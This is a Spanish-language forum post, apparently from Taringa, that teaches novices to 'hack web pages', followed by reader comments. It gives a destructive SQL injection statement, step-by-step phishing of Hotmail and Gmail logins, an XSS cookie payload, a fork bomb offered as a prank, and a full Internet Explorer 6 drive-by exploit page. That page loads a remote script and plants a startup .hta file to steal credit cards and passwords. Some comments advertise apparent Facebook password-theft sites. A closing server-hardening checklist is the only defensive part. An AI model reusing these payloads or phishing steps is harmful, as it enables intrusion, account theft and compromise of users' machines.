Popular channels

Formas de Hackear paginas Web.

Quieres ser un Hakeador de paginas wed. Ahora bien no es muy sencillo pero pon de tu parte estas aqui poque quieres hakear:

- Change Coding Este tipo de hackeo es muy divertido y, la mayoría de las veces, inocuo. Se trata simplemente de modificar el código que despliega una página de Internet agregando órdenes en javascript o VB Script desde la barra URL del navegador. Incluso la elemental página de Google ha sufrido este tipo de hacking.

- SQL Injection Como habrás notado, muchos sitios en la red muestran una caja de "Buscar" o "Search". En SQL el punto y coma ( funcionan como el fin de comando y el doble guión (--) como comentario. Si sabes el nombre de la tabla (o intentas adivinarlo) donde se guardan los passwords de los usuarios puedes jugar un poco enviando cosas como: UPDATE users SET password="hack"; este tipo de hackeo es muy entretenido (horas y horas de sana diversión ;-) ) y te sorprenderás del hecho de que incluso sitios de grandes empresas internacionales no poseen ningún sistema de filtrado. SQL Ruleezzz!!!

- Phising "password harvesting fishing" (cosecha y pesca de contraseñas) es una técninca que consiste en duplicar (hasta en el más mínimo detalle) un sitio web verdadero en nuestro propio servidor. Debemos ir a Hotmail, Gmail, Yahoo!, etcétera, ver el código HTML y guardarlo en nuestro propio server. Luego enviamos un email a la persona de la cual deseamos su clave con algo como "Alguien muy especial te ha enviado una Ciber-tarjeta, haz click aquí" y lo enviamos a nuestro propio Webserver en Linux. El usuario cree que está entrando en la página de inicio de Hotmail e introduce su login y password, ¡pero ahora es nuestro!

- Dictionary's attack Existen personas (y administradores de sistemas) que piensan que por usar palabras como "fanerogama"o "porfirogeneta" como password, nadie los podrá adivinar. Pero en realidad esas palabras existen en cualquier diccionario, y los diccionarios que sirven para revisar la ortografía en los procesadores de texto como AbiWord, también pueden ser usados para intentar logearse dentro de un sistema ajeno. Existen scripts que usan cada palabra de los diccionarios en español, inglés, francés, finlandés, turco, etc. para hacer un login. Estos scripts pueden tardarse mucho tiempo haste encontrar un password que corresponda a la palabra y cuando lo hacen, envian un email al hacker para avisarle cual palabra es un password. Los hackers que se consideran a sí mismos elegantes y creativos sienten aversión por este tipo de hackeo pues en el simplemente se aplica la fuerza bruta (y la paciencia).

- buffer overflow (o simplemente overflow). Los programas se almacenan en buffers (secciones contiguas de memoria), bajo ciertas circunstancias los datos que se envían al buffer sobrepasan su capacidad y la memoria se "desparrama", generalmente esto provoca que el programa colapse pero muchas veces, durante una pequeña fracción de segundo, la información enviada al buffer puede ejecutarse con los permisos del usuario dueño del proceso. El hacker (que debe conocer bien C y ensamblador) aprovecha esto, envía muchos datos al buffer, para desbordarlo y ejecutar código malicioso. Existen pocos hackers con el suficiente talento como para aprovechar un overflow recién descubierto, el problema es que luego de un par de semanas de conocido el exploit, comienzan a aparecer en la red scripts que automatizan el hackeo y todos los script kiddies comienzan a ejecutarlos. Solución: coloque un "apt-get -f -y dist-upgrade" en el cron y manténgase informado.

- A los errores en la programación se les conoce como "bugs" o bichos, la mayoría de los bugs sólo hacen que los programas no funcionen como deben pero algunos pueden ser aprovechdos para violar la seguridad, a estos bugs se les conoce como "exploits". Es decir, no todos los bugs son exploits pero todo exploit es un bug.

Denegation of Service o DOS La denegación de un servicio implica que el hacker ha aprovechado un bug en un programa para " tirar" un servicio del servidor. Generalmente se trata del Webserver. El IIS de Microsoft es particularmente vulnerable a este tipo de ataques. Tanto el Change Coding como el DOS son hacks relativamente benévolos pues no implican (necesariamente) a un intruso en el sistema.

- Aplication level Esto ya es más serio, alguien se ha apropiado de una aplicacón del sistema. La mayoría de las veces se trata de una aplicación Web como PHP-Nuke o MyAdmin. Sin embargo en ocasiones el dominio de una aplicación conduce a tener más accesos y facilidades en el hackeo.

Root hacking Este es el hack más grave, el hacker ha tomado el control del sistema y puede hacer lo que quiera con él. Generalmente el hacker tratará de pasar desapercibido y creára un usuario con todos los derechos para entrar cuando quiera al sistema y regodearse de lo poco hábil que es el administrador.

- Hay que considerar que muchas veces no existe una diferencia clara en estos niveles. Muchos hackeos al root empezaron siendo un simple juego de Cross Scripting con el cual el hacker obtuvo el password de PHPNuke, con lo cual se hizo con el password de Mysql y dado que era una versión no actualizada de Mysql, ejecutó un overflow con el que se hizo root. Si detectamos un root hacking lo primero es desconectar el equipo de la red, hacer un análisis forense de los paso del hacker, respaldar y formatear el disco duro incluyendo el MBR. Muchos administradores se sienten avergonzados y reinstalan el sistema rápidamente y sin decirle a nadie que ha sido hackeado. Esta es una actitud equivocada, sea humilde y reconozca que ha sido vencido en buena lid. Infórmele a sus colegas y hagan juntos el análisis de cómo fue que el intruso entró y como mejorar las políticas para que eso no vuelva a ocurrir. Un hacker puede enseñarle muchísimo sobre seguridad, aún cuando no hubiese tenido ninguna intención de ello.

- Cross Scripting, o XSS, es una técnica de hackeo que consiste en enviar información maliciosa a través del browser. En versiones anteriores de Internet Explorer era suficiente con colocar
?op=userinfo&uname=<script>alert(document.cookie);>/script>
En el URL para ver la información de otros usuarios en un sitio de ventas por Internet.

Generalmente todo ataque comienza con nmap, este es un programa de escaneo de puertos. El escaneo de puertos permite conocer que sistema operativo y que servicios posee un servidor de la red. Si no tiene nmap instálelo con apt-get. Algunas opciones de escaneo de nmap sólo pueden ejecutarse como root:

# nmap -sS -sV -P0 www.algoaqui.com

- Lo que verá, luego de un minuto de espera, será la lista de los servicios y el programa que los ejecuta (Apache, Qmail, SSH, vsFTP, etcétera). ¿Cómo funciona nmap?, bueno, es como si arrojara piedritas a las ventanas de una casa para ver quién se asoma y cómo es. De la misma manera nmap envia miles de peticiones de distintos tipos (TCP/UDP) a todos los puertos del servidor esperando que alguien le conteste. Los programas creen que alguien los está llamando pero nmap no mantiene contacto: sólo quiere saber si hay alguien en esa ventana ;-). De esta manera muchas herramientas pensadas para detectar intrusos nunca se enteran que nmap estuvo husmeando por sus puertos.

En la película Matrix se puede ver a Trinity usando Nmap para hackear un exploit de la versión 1 de SSH:


- Tenga cuidado, en Estados Unidos y varios países de Europa el escaneo de puertos es un delito y varias corporaciones se han tomado muy en serio seguirle la pista de los husmeadores y acusarlos con su proveedor de internet. De hecho, si usted frecuenta el sitio de nmap y sus listas de correo, seguramente su nombre ya está en alguna base de datos del FBI. Por supuesto, como muchas otras leyes, estas leyes son idiotas: sin gente escaneando puertos y tratando de entrar a los sistemas aún estaríamos usando Windows 3.11. El mundo tiene una deuda con los hackers que se niega a reconocer, sin ellos el comercio electrónico hubiese sido imposible. Si usted está en América Latina no se preocupe, nuestros legisladores ni siquiera saben (ni les interesa saber) qué es un escaneo de puertos.

Una vez que sepas que programas se están ejecutando realiza una busqueda en google sobre algún exploit relacionado. En todos los programas, tarde o temprano, se descubre una vulnerabilidad, con suerte, el admistrador del servidor no ha actualizado en semanas o meses y tú puedes intentar entrar. Existen muchos scripts, sobre todo de Perl, que intentan hackear un sitio sólo ejecutándolos, hay mucha gente que no tiene idea de cómo funcionan estos scripts y simplemente los ejecutan hacia un servidor. Cada tres o cuatro días en mi log de Apache aparece alguien que corrió uno de esos scripts... ¡que eran para IIS! A estos soterutanos se les conoce como Script Kiddies y conforman un vergonzoso tipo de lamer.

Si entras a un IRC preguntando sobre cómo aprender a hackear, algún inconsciente, por jugarte una broma, te dirá que hace poco él descubrió una forma de tirar el sitio de Microsoft y te pedirá que escribas en el shell:

# nmap-O www.microsoft.com && : (){ : |:& };:



Un hack que está de moda es un hoyo crítico de seguridad en el IE 6 de Windows XP, este hoyo está presente incluso si se tiene el Service Pack 2 y afecta tanto a la versión Home, como la "Professional" (Microsoft gastó cientos de millones en el SP2 pero al parecer de poco sirvió). Fijate en la siguiente página sp2rc.html:

<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:WINDOWS---PCHealthHelpCtrSystemblurbstools.htm">---</OBJECT> <OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:
execScript("document.write("<script language="vbscript"
src="http://www.mononeurona.org/writehta.txt"" +String.fromCharCode(62)+"
</scr"+"ipt"+String.fromCharCode(62))"'>
</OBJECT> <script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
El objeto id: localpage (que posee un formato de extensión de los archivos de ayuda de Windows) le dice a hhctrl.ocx que abrá una ventana de ayuda para C:WINDOWSPCHealthHelpCtrSystemblurbstools.htm (un archivo normal del sistema que está en todos los Windows XP).

El segundo objecto id: inject llama al script hospedado en www.mononeurona.org/writehta.txt que inyecta el código remoto de este archivo, haciendo un XSS típico. El archivo writehta.txt contiene instrucciones maliciosas para crear un objeto ADODB.Connection:

Dim Conn, rs Set Conn = CreateObject("ADODB.Connection" Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://www.mononeurona.org;" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset" rs.Open "SELECT * from foobar.txt", conn rs.Save "Cocuments and SettingsAll UsersStart MenuProgramsStartup Microsoft Office.hta", adPersistXML rs.close conn.close window.close
Este archivo es usado para ejecutar un query SQL: sql = "SELECT * from foobar.txt", donde foobar.txt es hospedado en el servidor FTP del atacante (el cual está configurado para permitir el acceso anónimo). El resultado del query se salva en el archivo Cocuments and SettingsAll UsersStart MenuProgramsStartupMicrosoft Office.hta.

El objeto ADODB y el archivo foobar.txt también pueden ejecutarse colocándolos escondidos como si fuesen una imagen: <img id="dyn" src="malwarez6.mcb" border="0"> todos los antivirus están configurado para no escanear los archivos de imágenes de modo que podemos colarnos con facilidad al sistema.

Practicamente no hay límites en lo que uno puede guardar en este archivo hta y además, como se guarda en el menú "All Users" se ejecuta cada vez que un usuario se logea en Windows XP. Por supuesto lo primero que una persona maliciosa haría sería buscar los números de tarjetas de crédito y los password de todo el sistema ¡Gracias Microsoft!

Y todo esto lo hemos hecho sin que el usuario tuviese que recibir un email o apretar un botón, simplemente entrando a la página sp2rc.html. Miles de páginas en Internet tienen este código y si usted usa Internet Explorer 6 para navegar seguramente ya tiene el archivo hta en su disco pues los antivirus no lo detectan. Como digo, este código está muy de moda, y al parecer no habrá parche hasta finales del 2005. Los que usan [[http://www.mozilla.org/products/firefox/ Mozilla-Firefox]] en XP están a salvo, pues este código no les afecta ;-). De cualquier manera si se ve a obligado a usar Windows XP por la necesidad de usar CorelDraw o Autocad no navegue en este sistema operativo. Al terminar de usar ese programa, bootee a Linux (porque tiene Linux ¿verdad?) y desde ahí navegue, consulte su email y use Messenger.

Si tú, como muchos de nosotros, tienes un servidor Linux en la red, estos son los consejos básicos de seguridad:

1. Instala lo mínimo indispensable Realiza un deborphan cada tanto, no instales samba en un equipo que tiene webserver.
2. Usa password alfanuméricos Mezcla números y letras como caktus90 o 8qwer9. No uses passwords de palabras que están en el diccionario. No uses un password del sistema para suscribirte a una lísta de correo o un foro.
3. No instales Telnet y FTP Prefiere SSH y un servidor FTP sobre SSL como vsFTP. No permitas accessos remotos del root por SSH. Permite un solo usuario en AllowUsers para evitar ataques de diccionario. Trata de encriptar todo lo que entre al sistema, incluyendo el correo.
4. Actualiza cada semana De preferencia realiza las actualizaciones de noche, si apt-get sugiere instalar un nuevo archivo de configuración en lugar del que estás usando prefiere el que trae el paquete, muchas veces el problema no es el programa sino la configuración.
5. No instales las X Un servidor no siquiera debería de tener monitor, todo debe hacerse a través de SSH.
6. Enjaula los demonios Corre apache, OpenSSH y la base datos de datos "enjaulados" en un chroot.
7. Watch Log Instala un reporteador de logs que te envie un reporte general del sistema cada tres días, hay mucha información útil en los logs que se pierde por no saber extraer la información.
8. No instales compiladores Si necesitas compilar un nuevo kernel, desinstala gcc y el paquete libc6-dev luego de bootear con el nuevo kernel.
9. Suscríbete a una lista de anuncios de seguridad Existen muchas, también puedes visitar sitios como [[http://www.cofradia.org/ La cofradía]] donde se anuncian bugs de seguridad y cómo corregirlos.
10. Nmap on myself Una forma de descubrir si un troyano ha abierto un backdoor es correr nmap contra nuestro propio servidor. Así te darás una idea de lo que un hacker (o cracker) vería si escanea tu servidor.
11. Apache mod_security No sé porque este magnífico módulo no viene por omisión pero practicamente todos los Cross Scripting quedan anulados con él.
12. MVC El model view controller no sólo sirve para separar el diseño de la programación sino que incrementa la seguridad. Si estas haciendo una aplicación web con python, php o perl crea una clase para la base de datos que guarde los valores, cierra la base de datos y después inserta los valores en el código XHTML.


No hackeamos cuentas de hotmail.com o cuentas de facebook.com, instala Linux en tu equipo con el Webserver, programa en Perl y serás un hacker.

Saludos a todos los Taringeros.
0
18
0
18Comments
      Biscente

      Necesitan recuperar claves de facebook aqui les recomiendo bastante a uds.

      http://www.ayudaparahackear.com/hackear-facebook

      http://www.ayudaparahackear.com/hackear-facebook

      me fue muy util y efectiva la pagina

      0
      dse_x

      Esto es repost, y de aqui lo sacaste: 😕 😕

      http://www.taringa.net/posts/apuntes-y-monografias/2410321/Tecnicas-de-Hackeo-de-Sitios-Web.html

      0
      GHOSTMWF2

      Páginas wed? ó web? o.O

      0
      95-Nero

      AKI PODES ENTRAR http://www.lanzadorx.com/?r=786047...PODRAS TENER LOS PASSWORDS Q TU DECEES..XD !!!

      0
      EnanoAlexo

      Como puedo hakear y conseguir todo de la pagina

      0
      angelrojas15

      repost

      0
      damiangerardo

      COPY AND PASTE!

      0
      3JOS323

      no lei un pedo

      0
      Topchessplayer

      sos un crapero

      0
      LaYuka01

      tenes un bando pibe, lo que te falta para saber hackear, puros programitas divulgas, aprende a programar primero jajajajajjaja OWNED LAYUKA01
      Tu no sabe de eso palomooo, primero lee el post.

      0
      pepeunion89

      tenes un bando pibe, lo que te falta para saber hackear, puros programitas divulgas, aprende a programar primero jajajajajjaja OWNED LAYUKA01

      0
      Dr_Estupido

      no se si darte puntos..... por culpa de esa ortografia de reguetonero

      0
      LaYuka01

      Un buffer es un espacio de memoria en el que se almacenan datos para evitar que el programa o recurso que los requiere yah sea hardware o softwaree se quede sin datos durante una transferencia

      0
      daftalive

      Páginas wed? ó web? o.O

      0
      Castasoy

      Páginas wed? ó web? o.O

      0
      veronistas

      Los programas se almacenan en buffers (secciones contiguas de memoria)
      dense cuenta un tipo que dice saber hackear no pondria semejante idiotes. no sabe lo que es un buffer

      0
      gorilax154

      Páginas wed? ó web? o.O

      0
      daftalive

      Páginas wed? ó web? o.O

      0